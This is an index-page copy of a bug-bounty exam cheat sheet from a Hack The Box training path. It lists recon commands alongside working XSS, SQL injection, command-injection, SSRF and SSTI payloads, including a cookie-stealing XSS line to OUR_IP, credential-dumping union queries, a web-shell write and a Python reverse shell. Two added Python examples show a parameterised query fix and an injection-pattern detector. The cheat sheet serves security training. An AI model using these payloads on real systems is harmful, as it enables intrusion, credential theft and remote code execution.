Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.


https://github.com/theunknownsoul/htb-certified-bug-bounty-hunter-exam-cheetsheet

All cheat sheets with the main information from the HTB CBBH role path in one place.

bugbounty cheetsheet htb security


README


# HTB-certified-bug-bounty-hunter-exam-cheetsheet
All cheat sheets with the main information from the CBBH role path in one place.

# Information Gathering

### WHOIS

| Command | Description |
|----------------------------|-------------------------------------------|
| ```nslookup ``` | Identify A record for the target domain. |
| ```export TARGET="domain.tld"``` | Assign target to an environment variable. |
| ```whois $TARGET``` | WHOIS lookup for the target. |

### DNS Enumeration

| Command | Description |
|----------------------------------|----------------------------------------------------|
| ```nslookup $TARGET``` | Identify the A record for the target domain. |
| ```nslookup -query=A $TARGET``` | Identify the A record for the target domain. |
| ```dig @``` | Identify the A record for the target domain. |
| ```dig a $TARGET @``` | Identify the A record for the target domain. |
| ```nslookup -query=PTR ``` | Identify the PTR record for the target IP address. |
| ```dig -x @``` | Identify the PTR record for the target IP address. |
| ```nslookup -query=ANY $TARGET``` | Identify ANY records for the target domain. |
| ```dig any $TARGET @``` | Identify ANY records for the target domain. |
| ```nslookup -query=TXT $TARGET``` | Identify the TXT records for the target domain. |
| ```dig txt $TARGET @``` | Identify the TXT records for the target domain. |
| ```nslookup -query=MX $TARGET``` | Identify the MX records for the target domain. |
| ```dig mx $TARGET @``` | Identify the MX records for the target domain. |

### Passive Subdomain Enumeration

| Resource/Command | Description |
|-------------------------------------------------------|---------------------------------------------------------------------|
| VirusTotal | https://www.virustotal.com/gui/home/url |
| Censys | https://censys.io/ |
| Crt.sh | https://crt.sh/ |
| ```curl -s https://sonar.omnisint.io/subdomains/{domain} \| jq -r '.[]' \| sort -u``` | All subdomains for a given domain. |
| ```curl -s https://sonar.omnisint.io/tlds/{domain} \| jq -r '.[]' \| sort -u``` | All TLDs found for a given domain. |
| ```curl -s https://sonar.omnisint.io/all/{domain} \| jq -r '.[]' \| sort -u``` | All results across all TLDs for a given domain. |
| ```curl -s https://sonar.omnisint.io/reverse/{ip} \| jq -r '.[]' \| sort -u``` | Reverse DNS lookup on IP address. |
| ```curl -s https://sonar.omnisint.io/reverse/{ip}/{mask} \| jq -r '.[]' \| sort -u``` | Reverse DNS lookup of a CIDR range. |
| ```curl -s "https://crt.sh/?q=${TARGET}&output=json" \| jq -r '.[] \| "\(.name_value)\n\(.common_name)"' \| sort -u``` | Certificate Transparency. |
| ```cat sources.txt \| while read source; do theHarvester -d "${TARGET}" -b $source -f "${source}-${TARGET}";done``` | Searching for subdomains and other information on the sources provided in the sources.txt list. |

### Passive Infrastructure Identification

| Resource/Command | Description |
|------------------------------------------------------|------------------------------------------------------------|
| Netcraft | https://www.netcraft.com/ |
| WayBackMachine | http://web.archive.org/ |
| WayBackURLs | https://github.com/tomnomnom/waybackurls |
| ```waybackurls -dates https://$TARGET > waybackurls.txt``` | Crawling URLs from a domain with the date it was obtained. |

### Active Infrastructure Identification

| Resource/Command | Description |
|-----------------------------------------------------------------------|-----------------------------------------------|
| ```curl -I "http://${TARGET}"``` | Display HTTP headers of the target webserver. |
| ```whatweb -a https://www.facebook.com -v``` | Technology identification. |
| Wappalyzer | https://www.wappalyzer.com/ |
| ```wafw00f -v https://$TARGET``` | WAF Fingerprinting. |
| Aquatone | https://github.com/michenriksen/aquatone |
| ```cat subdomain.list \| aquatone -out ./aquatone -screenshot-timeout 1000``` | Makes screenshots of all subdomains in the subdomain.list. |

### Active Subdomain Enumeration

| Resource/Command | Description |
|----------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------|
| HackerTarget | https://hackertarget.com/zone-transfer/ |
| SecLists | https://github.com/danielmiessler/SecLists |
| ```nslookup -type=any -query=AXFR $TARGET nameserver.target.domain ``` | Zone Transfer using Nslookup against the target domain and its nameserver. |
| ```gobuster dns -q -r "${NS}" -d "${TARGET}" -w "${WORDLIST}" -p ./patterns.txt -o "gobuster_${TARGET}.txt"``` | Bruteforcing subdomains. |

### Virtual Hosts

| Resource/Command | Description |
|---------------------------------------------------------------------------------------------------------------------------------|---------------------------------------------------------------------------|
| ```curl -s http://192.168.10.10 -H "Host: randomtarget.com" ``` | Changing the HOST HTTP header to request a specific domain. |
| ```cat ./vhosts.list \| while read vhost;do echo "\n********\nFUZZING: ${vhost}\n********";curl -s -I http:// -H "HOST: ${vhost}.target.domain" \| grep "Content-Length: ";done``` | Bruteforcing for possible virtual hosts on the target domain. |
| ```ffuf -w ./vhosts -u http:// -H "HOST: FUZZ.target.domain" -fs 612``` | Bruteforcing for possible virtual hosts on the target domain using ffuf. |

### Crawling

| Resource/Command | Description |
|----------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------|
| ZAP | https://www.zaproxy.org/ |
| ```ffuf -recursion -recursion-depth 1 -u http://192.168.10.10/FUZZ -w /opt/useful/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt``` | Discovering files and folders that cannot be spotted by browsing the website. |
| ```ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://www.target.domain/FOLDERS/WORDLISTEXTENSIONS``` | Mutated bruteforcing against the target web server. |

# JavaScript deobfuscation

| Websites |
|---------------------|
| JS Console Prettier |
| Beautifier |
| JSNice |

# Cross-site scripting (XSS)

| Code | Description |
|---------------------------------------------------------------------------------------------------|--------------------------------|
| ```alert(window.origin)``` | Basic XSS Payload |
| `````` | Basic XSS Payload |
| ```print()``` | Basic XSS Payload |
| `````` | HTML-based XSS Payload |
| ```document.body.style.background = "#141d2b"``` | Change Background Color |
| ```document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"``` | Change Background Image |
| ```document.title = 'HackTheBox Academy'``` | Change Website Title |
| ```document.getElementsByTagName('body')[0].innerHTML = 'text'``` | Overwrite website's main body |
| ```document.getElementById('urlform').remove();``` | Remove certain HTML element |
| `````` | Load remote script |
| ```new Image().src='http://OUR_IP/index.php?c='+document.cookie``` | Send Cookie details to us |

# SQL injection

| Command | Description |
|------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------|
| ```mysql -u root -h docker.hackthebox.eu -P 3306 -p``` | login to mysql database |
| ```SHOW DATABASES ``` | List available databases |
| ```USE users ``` | Switch to database |
| ```CREATE TABLE logins (id INT, ...)``` | Add a new table |
| ```SHOW TABLES ``` | List available tables in current database |
| ```DESCRIBE logins ``` | Show table properties and columns |
| ```INSERT INTO table_name VALUES (value_1,..)``` | Add values to table |
| ```INSERT INTO table_name(column2, ...) VALUES (column2_value, ..)``` | Add values to specific columns in a table |
| ```UPDATE table_name SET column1=newvalue1, ... WHERE ``` | Update table values |
| ```SELECT * FROM table_name``` | Show all columns in a table |
| ```SELECT column1, column2 FROM table_name``` | Show specific columns in a table |
| ```DROP TABLE logins``` | Delete a table |
| ```ALTER TABLE logins ADD newColumn INT``` | Add new column |
| ```ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn``` | Rename column |
| ```ALTER TABLE logins MODIFY oldColumn DATE``` | Change column datatype |
| ```ALTER TABLE logins DROP oldColumn``` | Delete column |
| ```SELECT * FROM logins ORDER BY column_1``` | Sort by column |
| ```SELECT * FROM logins ORDER BY column_1 DESC``` | Sort by column in descending order |
| ```SELECT * FROM logins ORDER BY column_1 DESC, id ASC``` | Sort by two columns |
| ```SELECT * FROM logins LIMIT 2``` | Only show first two results |
| ```SELECT * FROM logins LIMIT 1, 2``` | Only show first two results starting from index 2 |
| ```SELECT * FROM table_name WHERE ``` | List results that meet a condition |
| ```SELECT * FROM logins WHERE username LIKE 'admin%'``` | List results where the name is similar to a given string |
| ```admin' or '1'='1``` | Basic Auth Bypass |
| ```admin')-- -``` | Basic Auth Bypass With comments |
| ```' order by 1-- -``` | Detect number of columns using order by |
| ```cn' UNION select 1,2,3-- -``` | Detect number of columns using Union injection |
| ```cn' UNION select 1,@@version,3,4-- -``` | Basic Union injection |
| ```UNION select username, 2, 3, 4 from passwords-- -``` | Union injection for 4 columns |
| ```SELECT @@version ``` | Fingerprint MySQL with query output |
| ```SELECT SLEEP(5)``` | Fingerprint MySQL with no output |
| ```cn' UNION select 1,database(),2,3-- -``` | Current database name |
| ```cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -``` | List all databases |
| ```cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -``` | List all tables in a specific database |
| ```cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -``` | List all columns in a specific table |
| ```cn' UNION select 1, username, password, 4 from dev.credentials-- -``` | Dump data from a table in another database |
| ```cn' UNION SELECT 1, user(), 3, 4-- -``` | Find current user |
| ```cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -``` | Find if user has admin privileges |
| ```cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -``` | Find all user privileges |
| ```cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -``` | Find which directories can be accessed through MySQL |
| ```cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- - ``` | Read local file |
| ```select 'file written successfully!' into outfile '/var/www/html/proof.txt'``` | Write a string to a local file |
| ```cn' union select "",'', "", "" into outfile '/var/www/html/shell.php'-- - ``` | Write a web shell into the base web directory |
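As an added example (not from the cheat sheet), the `admin' or '1'='1` bypass from the table run against a string-built query and against a parameterised one; an in-memory SQLite table stands in for the MySQL `logins` table, and the account data is constructed.

```python
import sqlite3


def make_db():
    """Constructed sample data: an in-memory SQLite stand-in for the MySQL
    'logins' table used in the cheat sheet, with one made-up account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE logins (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO logins VALUES (1, 'admin', 'S3cretPass')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the WHERE clause by string concatenation, so a quote in the
    input closes the literal and the remainder is parsed as SQL."""
    query = ("SELECT id FROM logins WHERE username='" + username +
             "' AND password='" + password + "'")
    return conn.execute(query).fetchone() is not None


def login_safe(conn, username, password):
    """Same query with bound parameters: the driver passes the values
    separately from the SQL text, so the quote stays inside the string."""
    query = "SELECT id FROM logins WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone() is not None


def demo():
    """Run the 'Basic Auth Bypass' payload from the table against both versions.

    With concatenation the query becomes
      ... WHERE username='admin' or '1'='1' AND password='wrong'
    and AND binds tighter than OR, so the username='admin' branch alone
    satisfies the WHERE clause."""
    conn = make_db()
    payload = "admin' or '1'='1"
    return {
        "vulnerable_with_payload": login_vulnerable(conn, payload, "wrong"),
        "safe_with_payload": login_safe(conn, payload, "wrong"),
        "safe_with_real_creds": login_safe(conn, "admin", "S3cretPass"),
    }
```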

# Command injection

| Injection operator | Injected character | URL - encoded character | Executed Command |
|--------------------|--------------------|------------------------------------|---------------------------------------------|
| Semicolon | ; | %3b | Both |
| New Line | \n | %0a | Both |
| Background | & | %26 | Both (second output generally shown first) |
| Pipe | \| | %7c | Both (only second output is shown) |
| AND | && | %26%26 | Both (only if first succeeds) |
| OR | \|\| | %7c%7c | Second (only if first fails) |
| Sub-Shell | `` | %60%60 | Both (Linux-only) |
| Sub-Shell | $() | %24%28%29 | Both (Linux-only) |

### Command injection Bypass

| Command | Description |
|------------------------------------------------------------|-----------------------------------------------------------------------------------|
| ```printenv ``` | Can be used to view all environment variables |
| ```%09``` | Using tabs instead of spaces |
| ```${IFS} ``` | Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. $()) |
| ```{ls,-la}``` | Commas will be replaced with spaces |
| ```${PATH:0:1}``` | Will be replaced with / |
| ```${LS_COLORS:10:1}``` | Will be replaced with ; |
| ```$(tr '!-}' '"-~'<<<[)``` | Shift character by one ([ -> \) |
| ```' or "``` | Total must be even |
| ```$@ or \ ``` | Linux only |
| ```$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")``` | Execute command regardless of cases |
| ```$(a="WhOaMi";printf %s "${a,,}") ``` | Another variation of the technique |
| ```echo 'whoami' \| rev``` | Reverse a string |
| ```$(rev<<<'imaohw') ``` | Execute reversed command |
| ```echo -n 'cat /etc/passwd \| grep 33' \| base64``` | Encode a string with base64 |
| ```bash<<<$(base64 -d<< bill.txt``` | Generate Usernames List |
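As an added example (not part of the cheat sheet), a small detector that URL-decodes request parameters, including double-encoded ones, and reports which of the operators from the injection-operator table, plus the `${...}` expansion and tab tricks from the bypass table, each parameter carries. The `/ping?ip=` endpoint and the request targets are constructed sample input.

```python
from urllib.parse import parse_qsl, unquote, urlparse

# Operators from the injection-operator table, plus the ${...} expansion and
# tab separator tricks from the bypass table, keyed by the decoded sequence.
PATTERNS = {
    ";": "Semicolon", "\n": "New Line", "&&": "AND", "||": "OR",
    "&": "Background", "|": "Pipe", "`": "Sub-Shell (backticks)",
    "$(": "Sub-Shell ($())", "${": "Variable expansion (${IFS}, ${PATH:0:1})",
    "\t": "Tab used as separator",
}


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding until the value stops changing."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_patterns(value):
    """Return the pattern names found in one parameter value."""
    decoded = fully_decode(value)
    hits = []
    # Longest tokens first, so "&&" is reported as AND rather than Background.
    for token in sorted(PATTERNS, key=len, reverse=True):
        if token in decoded:
            hits.append(PATTERNS[token])
            decoded = decoded.replace(token, " ")
    return hits


def scan_request_target(target):
    """Map each query parameter of a request target to the patterns it carries."""
    findings = {}
    for name, value in parse_qsl(urlparse(target).query, keep_blank_values=True):
        hits = find_patterns(value)
        if hits:
            findings[name] = hits
    return findings


# Constructed sample request targets (a made-up /ping endpoint).
SAMPLE_TARGETS = [
    "/ping?ip=127.0.0.1",
    "/ping?ip=127.0.0.1%3bwhoami",
    "/ping?ip=127.0.0.1%26%26%24%28whoami%29",
    "/ping?ip=127.0.0.1%2524%257BIFS%257Dwhoami",   # double-encoded ${IFS}
]


def scan_all(targets=SAMPLE_TARGETS):
    """Return only the targets that carry at least one suspicious pattern."""
    return {t: scan_request_target(t) for t in targets if scan_request_target(t)}
```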

# Server side request forgery

| Command | Description |
|-----------------------------------------------------------------------------------------------------------------|---------------------------------------------------------------------------------|
| ```curl -i -s "http:///load?q=http://:8080" ``` | Testing for SSRF vulnerability |
| ```python3 -m http.server 9090 ``` | Starting the python web server |
| ```sudo pip3 install twisted ``` | Installing the ftp server |
| ```sudo python3 -m twisted ftp -p 21 -r . ``` | Starting the ftp server |
| ```curl -i -s "http:///load?q=http://:9090/index.html" ``` | Retrieving a remote file through the target application (HTTP Schema) |
| ```curl -i -s "http:///load?q=file:///etc/passwd" ``` | Retrieving a local file through the target application (File Schema) |
| ```for port in {1..65535};do echo $port >> ports.txt;done ``` | Generating a wordlist of possible ports |
| ```ffuf -w ./ports.txt:PORT -u "http:///load?q=http://127.0.0.1:PORT" -fs 30 ``` | Fuzzing for ports on the internal interface |
| ```curl -i -s "http:///load?q=http://127.0.0.1:5000" ``` | Interacting with the internal interface on the discovered port |
| ```curl -i -s "http:///load?q=http://internal.app.local/load?q=index.html" ``` | Interacting with the internal application |
| ```curl -i -s "http:///load?q=http://internal.app.local/load?q=http://127.0.0.1:1"``` | Discovering web application listening in on localhost |
| ```curl -i -s "http:///load?q=http://internal.app.local/load?q=http::////127.0.0.1:1" ``` | Modifying the URL to bypass the error message |
| ```curl -i -s "http:///load?q=http://internal.app.local/load?q=file:://///proc/self/environ" -o - ``` | Requesting to disclose the /proc/self/environ file on the internal application |
| ```curl -i -s "http:///load?q=http://internal.app.local/load?q=file:://///app/internal_local.py" ``` | Retrieving a local file through the target application |
| ```curl -i -s "http:///load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=whoami"``` | Confirming remote code execution on the remote host |
| ```sudo apt-get install jq``` | Installing jq |

### Blind SSRF Exploitation Example

| Command | Description |
|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------|
| ```nc -lvnp 9090 ``` | Starting a netcat listener |
| ```echo "\" \| base64 -d ``` | Decoding the base64 encoded response |
| ```export RHOST="";export RPORT="";python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' ``` | Reverse shell payload (to be URL encoded twice) |

### SSI Injection Exploitation Example

| Command | Description |
|----------------------------------------------------------------------------------------------------------------|----------------|
| `````` | Date |
| `````` | All variables |
| `````` | Reverse Shell |

### SSTI Exploitation Example 1

| Command | Description |
|------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------|
| ```curl -X POST -d 'email=${7*7}' http://:/jointheteam ``` | Interacting with the remote target (Spring payload) |
| ```curl -X POST -d 'email={{_self.env.display("TEST")}}' http://:/jointheteam ``` | Interacting with the remote target (Twig payload) |
| ```curl -X POST -d 'email={{config.items()}}' http://:/jointheteam ``` | Interacting with the remote target (Jinja2 basic injection) |
| ```curl -X POST -d 'email={{ [].class.base.subclasses() }}' http://:/jointheteam ``` | Interacting with the remote target (Jinja2 dump all classes payload) |
| ```curl -X POST -d "email={% import os %}{{os.system('whoami')}}" http://:/jointheteam``` | Interacting with the remote target (Tornado payload) |
| ```curl -gs "http://:/execute?cmd={{7*'7'}}"``` | Interacting with the remote target (Confirming Jinja2 backend) |
| ```./tplmap.py -u 'http://:/execute?cmd'``` | Automating the templating engine identification process with tplmap |